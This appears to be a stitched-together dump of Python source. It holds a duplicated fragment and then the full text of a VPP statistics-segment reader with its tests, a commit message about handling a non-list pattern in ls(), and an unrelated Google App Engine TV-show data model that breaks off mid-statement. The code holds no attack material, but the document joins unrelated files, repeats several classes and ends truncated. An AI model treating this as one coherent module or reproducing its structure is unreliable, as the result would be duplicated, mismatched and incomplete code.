    '''Combined Counters 2-dimensional by thread by index of packets/octets'''

    def packets(self):
        '''Packets column (index 0) across all threads.'''
        return [packets for packets, _ in self]

    def octets(self):
        '''Octets column (index 1) across all threads.'''
        return [octets for _, octets in self]

    def sum_packets(self):
        '''Total packets over all threads.'''
        return sum(self.packets())

    def sum_octets(self):
        '''Total octets over all threads.'''
        return sum(self.octets())
class StatsTuple(tuple):
    '''A Combined vector tuple (packets, octets)'''

    def __init__(self, data):
        super().__init__()
        # Keep a dict mirror so repr() reads like {'packets': .., 'bytes': ..}
        self.dictionary = {'packets': data[0], 'bytes': data[1]}

    def __repr__(self):
        return dict.__repr__(self.dictionary)

    def __getitem__(self, item):
        '''Index by position (0/1) or by name ('packets'/'bytes').'''
        if isinstance(item, int):
            return tuple.__getitem__(self, item)
        index = 0 if item == 'packets' else 1
        return tuple.__getitem__(self, index)
class StatsSimpleList(list):
    '''Simple Counters 2-dimensional by thread by index of packets'''

    def __getitem__(self, item):
        '''Supports partial numpy style 2d support. Slice by column [:,1]'''
        if isinstance(item, int):
            return list.__getitem__(self, item)
        # item is a (slice, column) pair, e.g. [:, 1]
        _, column = item
        return SimpleList([row[column] for row in self])
class SimpleList(list):
    '''Simple counter'''

    def sum(self):
        '''Sum of the per-thread values.'''
        total = 0
        for value in self:
            total += value
        return total
class StatsEntry():
    '''An individual stats entry.

    *stattype* selects how the raw *statvalue* (either the value itself or
    a pointer into the segment) is materialized into Python data.
    '''
    # pylint: disable=unused-argument,no-self-use

    def __init__(self, stattype, statvalue):
        self.type = stattype
        self.value = statvalue
        dispatch = {
            1: self.scalar,
            2: self.simple,
            3: self.combined,
            4: self.error,
            5: self.name,
        }
        self.function = dispatch.get(stattype, self.illegal)

    def illegal(self, stats):
        '''Invalid or unknown counter type'''
        return None

    def scalar(self, stats):
        '''Scalar counter: the value is stored directly in the entry.'''
        return self.value

    def simple(self, stats):
        '''Simple counter: per-thread vectors of packet counts.'''
        result = StatsSimpleList()
        for thread in StatsVector(stats, self.value, 'P'):
            result.append([value[0] for value in StatsVector(stats, thread[0], 'Q')])
        return result

    def combined(self, stats):
        '''Combined counter: per-thread vectors of (packets, octets).'''
        result = StatsCombinedList()
        for thread in StatsVector(stats, self.value, 'P'):
            result.append([StatsTuple(pair) for pair in StatsVector(stats, thread[0], 'QQ')])
        return result

    def error(self, stats):
        '''Error counter: one value per thread from the cached error vectors.'''
        result = SimpleList()
        for vector in stats.error_vectors:
            result.append(vector[self.value])
        return result

    def name(self, stats):
        '''Name counter: vector of string pointers.'''
        return [get_string(stats, ptr[0]) for ptr in StatsVector(stats, self.value, 'P')]

    def get_counter(self, stats):
        '''Return a list of counters'''
        return self.function(stats)
class TestStats(unittest.TestCase):
    '''Basic statseg tests.

    Integration tests: they require a live VPP instance exposing its stats
    socket with specific interfaces and counters present.
    NOTE(review): setUp references cProfile and tearDown references Stats,
    both only imported inside the __main__ guard below -- running this
    class through an external test runner raises NameError.
    '''
    def setUp(self):
        '''Connect to statseg'''
        self.stat = VPPStats()
        self.stat.connect()
        self.profile = cProfile.Profile()
        self.profile.enable()

    def tearDown(self):
        '''Disconnect from statseg'''
        self.stat.disconnect()
        # Print a cumulative-time profile of the test that just ran.
        profile = Stats(self.profile)
        profile.strip_dirs()
        profile.sort_stats('cumtime')
        profile.print_stats()
        print("\n--->>>")

    def test_counters(self):
        '''Test access to statseg'''
        print('/err/abf-input-ip4/missed', self.stat['/err/abf-input-ip4/missed'])
        print('/sys/heartbeat', self.stat['/sys/heartbeat'])
        print('/if/names', self.stat['/if/names'])
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx-miss', self.stat['/if/rx-miss'][1])
        print('/nat44-ed/out2in/slowpath/drops', self.stat['/nat44-ed/out2in/slowpath/drops'])
        print('Set Errors', self.stat.set_errors())
        with self.assertRaises(KeyError):
            print('NO SUCH COUNTER', self.stat['foobar'])
        print('/if/rx', self.stat.get_counter('/if/rx'))
        print('/err/ethernet-input/no error',
              self.stat.get_err_counter('/err/ethernet-input/no error'))

    def test_column(self):
        '''Test column slicing'''
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx', self.stat['/if/rx'])  # all threads, all interfaces
        print('/if/rx thread #1', self.stat['/if/rx'][0])  # all interfaces, thread 0
        print('/if/rx thread #1, interface #1',
              self.stat['/if/rx'][0][1])  # interface 1, thread 0
        print('/if/rx if_index #1', self.stat['/if/rx'][:, 1])
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].packets())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].sum_packets())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].octets())
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx-miss if_index #1 packets', self.stat['/if/rx-miss'][:, 1].sum())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][0][1]['packets'])

    def test_error(self):
        '''Test the error vector'''
        print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'])
        print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'])
        print('/err/ethernet-input', self.stat.get_err_counter('/err/ethernet-input/no error'))
        print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'].sum())

    def test_nat44(self):
        '''Test the nat counters'''
        print('/nat44-ei/ha/del-event-recv', self.stat['/nat44-ei/ha/del-event-recv'])
        print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'].sum())

    def test_legacy(self):
        '''Legacy interface'''
        directory = self.stat.ls(["^/if", "/err/ip4-input", "/sys/node/ip4-input"])
        data = self.stat.dump(directory)
        print(data)
        print('Looking up sys node')
        directory = self.stat.ls(["^/sys/node"])
        print('Dumping sys node')
        data = self.stat.dump(directory)
        print(data)
        # Non-matching pattern: expect an empty result, not an error.
        directory = self.stat.ls(["^/foobar"])
        data = self.stat.dump(directory)
        print(data)
if __name__ == '__main__':
    # Profiling helpers used by TestStats.setUp/tearDown; only available
    # when this file is executed directly as a script.
    import cProfile
    from pstats import Stats

    unittest.main()
stats: python: handle when pattern is not list in ls
The reimplementation of the Python stats module mishandled the case
where the pattern passed to ls was not a list.
Type: fix
Signed-off-by: Ole Troan <aeed71d78dc09e4764ceac69b111eee9b50cfdd0@cisco.com>
Change-Id: I9ba189423a76f2fd4298c4c4b19a0875f705d719
#!/usr/bin/env python3
#
# Copyright (c) 2021 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module implements Python access to the VPP statistics segment. It
accesses the data structures directly in shared memory.
VPP uses optimistic locking, so data structures may change underneath
us while we are reading. Data is copied out and it's important to
spend as little time as possible "holding the lock".
Counters are stored in VPP as a two dimensional array.
Index by thread and index (typically sw_if_index).
Simple counters count only packets, Combined counters count packets
and octets.
Counters can be accessed in either dimension.
stat['/if/rx'] - returns 2D lists
stat['/if/rx'][0] - returns counters for all interfaces for thread 0
stat['/if/rx'][0][1] - returns counter for interface 1 on thread 0
stat['/if/rx'][0][1]['packets'] - returns the packet counter
for interface 1 on thread 0
stat['/if/rx'][:, 1] - returns the counters for interface 1 on all threads
stat['/if/rx'][:, 1].packets() - returns the packet counters for
interface 1 on all threads
stat['/if/rx'][:, 1].sum_packets() - returns the sum of packet counters for
interface 1 on all threads
stat['/if/rx-miss'][:, 1].sum() - returns the sum of packet counters for
interface 1 on all threads for simple counters
'''
import os
import socket
import array
import mmap
from struct import Struct
import time
import unittest
import re
def recv_fd(sock):
    '''Receive the stats segment file descriptor over *sock*.

    The descriptor arrives as SCM_RIGHTS ancillary data; the message body
    itself is empty.
    '''
    fds = array.array("i")  # array of C ints
    _, ancdata, _, _ = sock.recvmsg(0, socket.CMSG_LEN(4))
    for level, ctype, cdata in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            # Keep only whole ints; drop any trailing partial element.
            usable = len(cdata) - (len(cdata) % fds.itemsize)
            fds.frombytes(cdata[:usable])
    return list(fds)[0]
VEC_LEN_FMT = Struct('I')


def get_vec_len(stats, vector_offset):
    '''Equivalent to VPP vec_len(): the 32-bit element count is stored
    8 bytes before the vector data.'''
    (length,) = VEC_LEN_FMT.unpack_from(stats.statseg, vector_offset - 8)
    return length
def get_string(stats, ptr):
    '''Decode an ASCII string vector at VPP virtual address *ptr*.

    Raises ValueError when the vector would run past the mapped segment.
    '''
    offset = ptr - stats.base
    strlen = get_vec_len(stats, offset)
    if offset + strlen >= stats.size:
        raise ValueError('String overruns stats segment')
    # The final byte is excluded, matching the original slice
    # (presumably a NUL terminator -- TODO confirm against VPP).
    return stats.statseg[offset:offset + strlen - 1].decode('ascii')
class StatsVector:
    '''A class representing a VPP vector.

    Wraps a vector living in the mapped stats segment: *ptr* is the VPP
    virtual address of the data and *fmt* a struct format string for one
    element. Bounds are validated against the segment size up front, and
    all reads happen under the optimistic stats lock.
    '''
    def __init__(self, stats, ptr, fmt):
        self.vec_start = ptr - stats.base
        self.vec_len = get_vec_len(stats, ptr - stats.base)
        self.struct = Struct(fmt)
        self.fmtlen = len(fmt)
        self.elementsize = self.struct.size
        self.statseg = stats.statseg
        self.stats = stats

        if self.vec_start + self.vec_len * self.elementsize >= stats.size:
            raise ValueError('Vector overruns stats segment')

    def __iter__(self):
        with self.stats.lock:
            return self.struct.iter_unpack(self.statseg[self.vec_start:self.vec_start +
                                                        self.elementsize*self.vec_len])

    def __getitem__(self, index):
        # Valid indexes are 0 .. vec_len-1.  The previous test
        # (index > self.vec_len) let index == vec_len read one element
        # past the end, and negative indexes read outside the vector.
        if index < 0 or index >= self.vec_len:
            raise ValueError('Index beyond end of vector')
        with self.stats.lock:
            if self.fmtlen == 1:
                # Single-element format: unwrap the 1-tuple.
                return self.struct.unpack_from(self.statseg, self.vec_start +
                                               (index * self.elementsize))[0]
            return self.struct.unpack_from(self.statseg, self.vec_start +
                                           (index * self.elementsize))
class VPPStats():
    '''Main class implementing Python access to the VPP statistics segment.

    Receives the shared-memory file descriptor over the stats unix socket,
    maps the segment read-only and reads counters under an optimistic lock
    (StatsLock raises IOError when the segment changed mid-read, in which
    case the caller should retry).
    '''
    # pylint: disable=too-many-instance-attributes
    # Header layout: version, base, epoch, in_progress, directory, errors.
    shared_headerfmt = Struct('QPQQPP')
    default_socketname = '/run/vpp/stats.sock'

    def __init__(self, socketname=default_socketname, timeout=10):
        self.socketname = socketname
        self.timeout = timeout
        self.directory = {}
        self.lock = StatsLock(self)
        self.connected = False
        self.size = 0
        self.last_epoch = 0
        self.error_vectors = 0
        self.statseg = 0

    def connect(self):
        '''Connect to stats segment'''
        if self.connected:
            return
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
        sock.connect(self.socketname)

        mfd = recv_fd(sock)
        sock.close()

        stat_result = os.fstat(mfd)
        self.statseg = mmap.mmap(mfd, stat_result.st_size, mmap.PROT_READ, mmap.MAP_SHARED)
        # The mmap holds its own reference; release the received descriptor.
        socket.close(mfd)

        self.size = stat_result.st_size
        if self.version != 2:
            raise Exception('Incompatible stat segment version {}'
                            .format(self.version))
        self.refresh()
        self.connected = True

    def disconnect(self):
        '''Disconnect from stats segment'''
        if self.connected:
            self.statseg.close()
            self.connected = False

    @property
    def version(self):
        '''Get version of stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[0]

    @property
    def base(self):
        '''Get base pointer of stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[1]

    @property
    def epoch(self):
        '''Get current epoch value from stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[2]

    @property
    def in_progress(self):
        '''Get value of in_progress from stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[3]

    @property
    def directory_vector(self):
        '''Get pointer of directory vector'''
        return self.shared_headerfmt.unpack_from(self.statseg)[4]

    @property
    def error_vector(self):
        '''Get pointer of error vector'''
        return self.shared_headerfmt.unpack_from(self.statseg)[5]

    # Directory entry: type (I), value (Q), NUL-padded name (128s).
    elementfmt = 'IQ128s'

    def refresh(self):
        '''Refresh directory vector cache (epoch changed)'''
        directory = {}
        with self.lock:
            for direntry in StatsVector(self, self.directory_vector, self.elementfmt):
                path_raw = direntry[2].find(b'\x00')
                path = direntry[2][:path_raw].decode('ascii')
                directory[path] = StatsEntry(direntry[0], direntry[1])
            self.last_epoch = self.epoch
            self.directory = directory

            # Cache the error index vectors
            self.error_vectors = []
            for threads in StatsVector(self, self.error_vector, 'P'):
                self.error_vectors.append(StatsVector(self, threads[0], 'Q'))

    def __getitem__(self, item):
        if not self.connected:
            self.connect()
        # The directory is stale once a writer bumped the epoch.
        if self.last_epoch != self.epoch:
            self.refresh()
        with self.lock:
            return self.directory[item].get_counter(self)

    def __iter__(self):
        return iter(self.directory.items())

    def set_errors(self):
        '''Return dictionary of error counters > 0'''
        if not self.connected:
            self.connect()

        errors = {k: v for k, v in self.directory.items() if k.startswith("/err/")}
        result = {}
        with self.lock:
            for k, entry in errors.items():
                total = 0
                i = entry.value
                for per_thread in self.error_vectors:
                    total += per_thread[i]
                if total:
                    result[k] = total
        return result

    def set_errors_str(self):
        '''Return all errors counters > 0 pretty printed'''
        error_string = ['ERRORS:']
        error_counters = self.set_errors()
        for k in sorted(error_counters):
            error_string.append('{:<60}{:>10}'.format(k, error_counters[k]))
        return '%s\n' % '\n'.join(error_string)

    def get_counter(self, name):
        '''Alternative call to __getitem__'''
        return self.__getitem__(name)

    def get_err_counter(self, name):
        '''Return a single value (sum of all threads)'''
        if not self.connected:
            self.connect()
        return sum(self.directory[name].get_counter(self))

    def ls(self, patterns):
        '''Returns list of counters matching pattern(s).

        Accepts a single regex string or a list of regex strings.
        '''
        # pylint: disable=invalid-name
        if not self.connected:
            self.connect()
        if not isinstance(patterns, list):
            patterns = [patterns]
        regex = [re.compile(i) for i in patterns]
        return [k for k, v in self.directory.items()
                if any(re.match(pattern, k) for pattern in regex)]

    def dump(self, counters):
        '''Given a list of counters return a dictionary of results'''
        if not self.connected:
            self.connect()
        result = {}
        for cnt in counters:
            result[cnt] = self.__getitem__(cnt)
        return result
class StatsLock():
    '''Stat segment optimistic locking.

    Readers record the segment epoch on acquire and validate it on
    release: if a writer was active or the epoch changed, the data read
    in between is invalid and release() raises IOError so the caller can
    retry.
    '''
    def __init__(self, stats):
        self.stats = stats
        self.epoch = 0

    def __enter__(self):
        acquired = self.acquire(blocking=True)
        assert acquired, "Lock wasn't acquired, but blocking=True"
        return self

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        self.release()

    def acquire(self, blocking=True, timeout=-1):
        '''Acquire the lock. Await in progress to go false. Record epoch.

        Returns False when non-blocking and a writer is active, or when
        *timeout* (seconds) expires; True otherwise.
        '''
        self.epoch = self.stats.epoch
        if timeout > 0:
            start = time.monotonic()
        while self.stats.in_progress:
            if not blocking:
                # Non-blocking mode must fail fast; the old code slept
                # here, i.e. behaved as a blocking acquire.
                return False
            time.sleep(0.01)
            # Compare elapsed time, not the absolute clock value: the old
            # "start + time.monotonic() > timeout" was effectively always
            # true because monotonic() is a large absolute number.
            if timeout > 0 and time.monotonic() - start > timeout:
                return False
        return True

    def release(self):
        '''Check if data read while locked is valid'''
        if self.stats.in_progress or self.stats.epoch != self.epoch:
            raise IOError('Optimistic lock failed, retry')

    def locked(self):
        '''Not used'''
class StatsCombinedList(list):
    '''Column slicing for Combined counters list'''

    def __getitem__(self, item):
        '''Supports partial numpy style 2d support. Slice by column [:,1]'''
        if isinstance(item, int):
            return list.__getitem__(self, item)
        # item is a (slice, column) pair, e.g. [:, 1]
        _, column = item
        return CombinedList([row[column] for row in self])
class CombinedList(list):
    '''Combined Counters 2-dimensional by thread by index of packets/octets'''

    def packets(self):
        '''Packets column (index 0) across all threads.'''
        return [packets for packets, _ in self]

    def octets(self):
        '''Octets column (index 1) across all threads.'''
        return [octets for _, octets in self]

    def sum_packets(self):
        '''Total packets over all threads.'''
        return sum(self.packets())

    def sum_octets(self):
        '''Total octets over all threads.'''
        return sum(self.octets())
class StatsTuple(tuple):
    '''A Combined vector tuple (packets, octets)'''

    def __init__(self, data):
        super().__init__()
        # Keep a dict mirror so repr() reads like {'packets': .., 'bytes': ..}
        self.dictionary = {'packets': data[0], 'bytes': data[1]}

    def __repr__(self):
        return dict.__repr__(self.dictionary)

    def __getitem__(self, item):
        '''Index by position (0/1) or by name ('packets'/'bytes').'''
        if isinstance(item, int):
            return tuple.__getitem__(self, item)
        index = 0 if item == 'packets' else 1
        return tuple.__getitem__(self, index)
class StatsSimpleList(list):
    '''Simple Counters 2-dimensional by thread by index of packets'''

    def __getitem__(self, item):
        '''Supports partial numpy style 2d support. Slice by column [:,1]'''
        if isinstance(item, int):
            return list.__getitem__(self, item)
        # item is a (slice, column) pair, e.g. [:, 1]
        _, column = item
        return SimpleList([row[column] for row in self])
class SimpleList(list):
    '''Simple counter'''

    def sum(self):
        '''Sum of the per-thread values.'''
        total = 0
        for value in self:
            total += value
        return total
class StatsEntry():
    '''An individual stats entry.

    *stattype* selects how the raw *statvalue* (either the value itself or
    a pointer into the segment) is materialized into Python data.
    '''
    # pylint: disable=unused-argument,no-self-use

    def __init__(self, stattype, statvalue):
        self.type = stattype
        self.value = statvalue
        dispatch = {
            1: self.scalar,
            2: self.simple,
            3: self.combined,
            4: self.error,
            5: self.name,
        }
        self.function = dispatch.get(stattype, self.illegal)

    def illegal(self, stats):
        '''Invalid or unknown counter type'''
        return None

    def scalar(self, stats):
        '''Scalar counter: the value is stored directly in the entry.'''
        return self.value

    def simple(self, stats):
        '''Simple counter: per-thread vectors of packet counts.'''
        result = StatsSimpleList()
        for thread in StatsVector(stats, self.value, 'P'):
            result.append([value[0] for value in StatsVector(stats, thread[0], 'Q')])
        return result

    def combined(self, stats):
        '''Combined counter: per-thread vectors of (packets, octets).'''
        result = StatsCombinedList()
        for thread in StatsVector(stats, self.value, 'P'):
            result.append([StatsTuple(pair) for pair in StatsVector(stats, thread[0], 'QQ')])
        return result

    def error(self, stats):
        '''Error counter: one value per thread from the cached error vectors.'''
        result = SimpleList()
        for vector in stats.error_vectors:
            result.append(vector[self.value])
        return result

    def name(self, stats):
        '''Name counter: vector of string pointers.'''
        return [get_string(stats, ptr[0]) for ptr in StatsVector(stats, self.value, 'P')]

    def get_counter(self, stats):
        '''Return a list of counters'''
        return self.function(stats)
class TestStats(unittest.TestCase):
    '''Basic statseg tests.

    Integration tests: they require a live VPP instance exposing its stats
    socket with specific interfaces and counters present.
    NOTE(review): setUp references cProfile and tearDown references Stats,
    both only imported inside the __main__ guard below -- running this
    class through an external test runner raises NameError.
    '''
    def setUp(self):
        '''Connect to statseg'''
        self.stat = VPPStats()
        self.stat.connect()
        self.profile = cProfile.Profile()
        self.profile.enable()

    def tearDown(self):
        '''Disconnect from statseg'''
        self.stat.disconnect()
        # Print a cumulative-time profile of the test that just ran.
        profile = Stats(self.profile)
        profile.strip_dirs()
        profile.sort_stats('cumtime')
        profile.print_stats()
        print("\n--->>>")

    def test_counters(self):
        '''Test access to statseg'''
        print('/err/abf-input-ip4/missed', self.stat['/err/abf-input-ip4/missed'])
        print('/sys/heartbeat', self.stat['/sys/heartbeat'])
        print('/if/names', self.stat['/if/names'])
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx-miss', self.stat['/if/rx-miss'][1])
        print('/nat44-ed/out2in/slowpath/drops', self.stat['/nat44-ed/out2in/slowpath/drops'])
        print('Set Errors', self.stat.set_errors())
        with self.assertRaises(KeyError):
            print('NO SUCH COUNTER', self.stat['foobar'])
        print('/if/rx', self.stat.get_counter('/if/rx'))
        print('/err/ethernet-input/no error',
              self.stat.get_err_counter('/err/ethernet-input/no error'))

    def test_column(self):
        '''Test column slicing'''
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx', self.stat['/if/rx'])  # all threads, all interfaces
        print('/if/rx thread #1', self.stat['/if/rx'][0])  # all interfaces, thread 0
        print('/if/rx thread #1, interface #1',
              self.stat['/if/rx'][0][1])  # interface 1, thread 0
        print('/if/rx if_index #1', self.stat['/if/rx'][:, 1])
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].packets())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].sum_packets())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][:, 1].octets())
        print('/if/rx-miss', self.stat['/if/rx-miss'])
        print('/if/rx-miss if_index #1 packets', self.stat['/if/rx-miss'][:, 1].sum())
        print('/if/rx if_index #1 packets', self.stat['/if/rx'][0][1]['packets'])

    def test_error(self):
        '''Test the error vector'''
        print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'])
        print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'])
        print('/err/ethernet-input', self.stat.get_err_counter('/err/ethernet-input/no error'))
        print('/err/ethernet-input', self.stat['/err/ethernet-input/no error'].sum())

    def test_nat44(self):
        '''Test the nat counters'''
        print('/nat44-ei/ha/del-event-recv', self.stat['/nat44-ei/ha/del-event-recv'])
        print('/err/nat44-ei-ha/pkts-processed', self.stat['/err/nat44-ei-ha/pkts-processed'].sum())

    def test_legacy(self):
        '''Legacy interface'''
        directory = self.stat.ls(["^/if", "/err/ip4-input", "/sys/node/ip4-input"])
        data = self.stat.dump(directory)
        print(data)
        print('Looking up sys node')
        directory = self.stat.ls(["^/sys/node"])
        print('Dumping sys node')
        data = self.stat.dump(directory)
        print(data)
        # Non-matching pattern: expect an empty result, not an error.
        directory = self.stat.ls(["^/foobar"])
        data = self.stat.dump(directory)
        print(data)

    def test_sys_nodes(self):
        '''Test /sys/nodes -- exercises ls() with a bare string pattern.'''
        counters = self.stat.ls('^/sys/node')
        print('COUNTERS:', counters)
        print('/sys/node', self.stat.dump(counters))
        print('/net/route/to', self.stat['/net/route/to'])
if __name__ == '__main__':
    # Profiling helpers used by TestStats.setUp/tearDown; only available
    # when this file is executed directly as a script.
    import cProfile
    from pstats import Stats

    unittest.main()
|
import logging
import re
import datetime
from pytz import utc
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from google.appengine.ext import db
from django.core.urlresolvers import reverse
from helper.string_utils import normalize
from series.tvrage import TVRage
class Show(db.Model):
    '''A TV show sourced from TVRage, stored in the App Engine datastore.

    Instances are cached in memcache both as an ordered list and as a
    key->show dict; any mutation should go through put() (which refreshes
    normalized_name) and be followed by clear_cache().
    '''
    name = db.StringProperty()
    normalized_name = db.StringProperty()
    alt_names = db.StringProperty()  # pipe-separated alternative names
    slug = db.StringProperty()
    description = db.StringProperty(indexed=False)
    genres = db.StringProperty(indexed=False)
    network = db.StringProperty(indexed=False)
    active = db.BooleanProperty()
    country = db.StringProperty(indexed=False)
    runtime = db.IntegerProperty()
    timezone = db.StringProperty(indexed=False)
    tvrage_id = db.IntegerProperty()

    _memkey_all_shows_ordered = "all_shows_ordered"
    _memkey_shows_dict = "all_shows_dict"
    # Matches a leading "The " so it can be moved to the end for sorting.
    re_find_the = re.compile("^The (.*)$")

    @classmethod
    def kind(cls):
        # Custom datastore kind name (default would be "Show").
        return "series_show"

    def __unicode__(self):
        return self.name

    @property
    def idnr(self):
        '''Numeric datastore id of this entity.'''
        return self.key().id()

    def alternative_names(self):
        '''Return alt_names split into a list; empty list when unset.'''
        if self.alt_names is None:
            return []
        return self.alt_names.split("|")

    @classmethod
    def get_all_ordered(cls):
        '''All shows sorted by display name ("The X" sorts as "X, The").

        Served from memcache when possible; names longer than 33 chars are
        truncated with an ellipsis before the "The" transform is applied.
        '''
        shows = memcache.get(cls._memkey_all_shows_ordered)
        if shows is not None:
            return shows
        shows = Show.all()
        show_list = []
        for show in shows:
            if len(show.name) > 33:
                show.ordered_name = cls.re_find_the.sub("\\1, The", show.name[:33]+"...")
            else:
                show.ordered_name = cls.re_find_the.sub("\\1, The", show.name)
            show_list.append(show)
        shows = sorted(show_list, key=lambda x: x.ordered_name)
        memcache.set(key=cls._memkey_all_shows_ordered, value=shows)
        return shows

    @classmethod
    def find(cls, show_name):
        '''Linear search by exact, normalized or alternative name.

        Returns None (implicitly) when nothing matches or the name is empty.
        '''
        if not len(show_name):
            return None
        norm_name = normalize(show_name)
        shows = Show.get_all_ordered()
        for show in shows:
            if show_name == show.name or norm_name == show.normalized_name or \
                any([norm_name == alt_name for alt_name in show.alternative_names()]):
                return show

    @classmethod
    def get_all_dict(cls):
        '''Memcached mapping of str(datastore key) -> show.'''
        show_dict = memcache.get(cls._memkey_shows_dict)
        if show_dict is not None:
            return show_dict
        shows = Show.get_all_ordered()
        show_dict = dict([(str(show.key()), show) for show in shows])
        memcache.set(key=cls._memkey_shows_dict, value=show_dict)
        return show_dict

    @classmethod
    def clear_cache(cls):
        '''Drop both memcache entries; next read repopulates them.'''
        memcache.delete(cls._memkey_all_shows_ordered)
        memcache.delete(cls._memkey_shows_dict)

    def add_update_task(self):
        '''Enqueue a background update of this show on the "series" queue.'''
        t = taskqueue.Task(url=reverse('seriesly-shows-update_show'), params={"key": str(self.key())})
        t.add(queue_name="series")
        return t

    def update(self, show_info=None, get_everything=False):
        '''Refresh this show (and its seasons) from TVRage.

        Fetches info when *show_info* is not supplied; only writes the
        entity when at least one attribute actually changed.
        '''
        if show_info is None:
            tvrage = TVRage()
            show_info = tvrage.get_info(self.tvrage_id)
        if show_info.name.startswith("'"): # Kill >>'Til Death<< here
            show_info.name = show_info.name.replace("'","",1)
        attr_list = ["name","network","genres","active","country","runtime","timezone","tvrage_id"]
        if self.update_attrs(show_info,attr_list):
            self.put()
        for season_info in show_info.seasons:
            logging.debug("Update or create Season...")
            Season.update_or_create(self, season_info, get_everything=get_everything)

    def update_attrs(self, info_obj, attr_list):
        '''Copy the listed attributes from info_obj; return True if any changed.'''
        changed = False
        for attr in attr_list:
            val = getattr(info_obj, attr)
            if val != getattr(self, attr):
                setattr(self, attr, val)
                changed = True
        return changed

    def put(self):
        # Keep the normalized name in sync on every write.
        self.normalized_name = normalize(self.name)
        return super(Show, self).put()

    @classmethod
    def update_or_create(cls, name, show_id=None):
        '''Look up a show on TVRage by name (or id) and create/refresh it.

        Returns False when TVRage has no match; otherwise returns None
        after updating (NOTE(review): inconsistent return values -- callers
        can only rely on the False case).
        '''
        tvrage = TVRage()
        if name is not None:
            show_info = tvrage.get_info_by_name(name)
        else:
            show_info = tvrage.get_info(show_id)
        if show_info is None:
            return False
        logging.debug("Show exists..?")
        show = Show.all().filter("tvrage_id =",show_info.tvrage_id).get()
        if show is None:
            logging.debug("Creating Show...")
            show = Show(name=show_info.name,
                        network=show_info.network,
                        genres=show_info.genres,
                        active=show_info.active,
                        country=show_info.country,
                        runtime=show_info.runtime,
                        timezone=show_info.timezone,
                        tvrage_id=show_info.tvrage_id)
            show.put()
        show.update(show_info)
class Season(db.Model):
    """One season of a Show; start/end mirror its first/last episode dates."""
    show = db.ReferenceProperty(Show)
    number = db.IntegerProperty()
    start = db.DateTimeProperty()  # air date of the season's first episode
    end = db.DateTimeProperty()    # air date of the season's last known episode

    @classmethod
    def kind(cls):
        # Datastore kind name, kept distinct from the class name.
        return "series_season"

    @classmethod
    def update_or_create(cls, show, season_info, get_everything=False):
        """Find (or create) the season of *show* matching season_info and refresh it."""
        season = Season.all().filter("show =", show).filter("number =",season_info.season_nr).get()
        logging.debug("Found season? %s" % season)
        if season is None:
            season = Season(show=show, number=season_info.season_nr)
            # Initial put so the entity has a key before episodes reference it.
            season.put()
        season.update(season_info, get_everything=get_everything)
        season.put()

    def update(self, season_info, get_everything=False):
        """Update/create this season's episodes from TVRage season_info.

        Unless get_everything is set, only episodes with no date or airing
        on/after 48 hours ago are pushed to the datastore. Also records the
        season's start (first episode date) and end (last episode date).
        """
        first_date = None
        episode_info = None
        now = utc.localize(datetime.datetime.now())
        fortyeight_hours_ago = now - datetime.timedelta(hours=48)
        for episode_info in season_info.episodes:
            logging.debug("Update episode... %s" % episode_info)
            if first_date is None:
                first_date = episode_info.date
            if get_everything or episode_info.date is None or episode_info.date >= fortyeight_hours_ago:
                episode = Episode.update_or_create(self, episode_info)
        logging.debug("All episodes updated...")
        self.start = first_date
        # episode_info deliberately leaks from the loop: it is the last episode.
        if episode_info is not None:
            self.end = episode_info.date
class Episode(db.Model):
    """A single episode; show/season references plus denormalized numbers."""
    show = db.ReferenceProperty(Show)
    season = db.ReferenceProperty(Season)
    season_number = db.IntegerProperty()
    number = db.IntegerProperty()
    title = db.StringProperty()
    text = db.TextProperty(default="")
    date = db.DateTimeProperty()

    # Memcache key for the per-show dict of recent episodes.
    _memkey_episode_dict = "all_episodes_dict"

    @classmethod
    def kind(cls):
        # Datastore kind name, kept distinct from the class name.
        return "series_episode"

    @property
    def date_end(self):
        """End of the air slot: start date plus the show's runtime (minutes)."""
        return self.date + datetime.timedelta(minutes=self.show.runtime)

    @classmethod
    def update_or_create(cls, season, episode_info):
        """Create or refresh the episode of *season* matching episode_info.nr."""
        episode = Episode.all().filter("show =",season.show).filter("season =",season)\
                    .filter("number =", episode_info.nr).get()
        logging.debug("Found episode... %s" % episode)
        if episode is None:
            episode = Episode.create(season, episode_info)
        else:
            episode.update(episode_info)
        episode.put()
        return episode

    @classmethod
    def create(cls, season, episode_info):
        """Build (without putting) a new Episode entity from TVRage info."""
        return Episode(show=season.show, season=season,
                       season_number=season.number,
                       number=episode_info.nr,
                       title=episode_info.title,
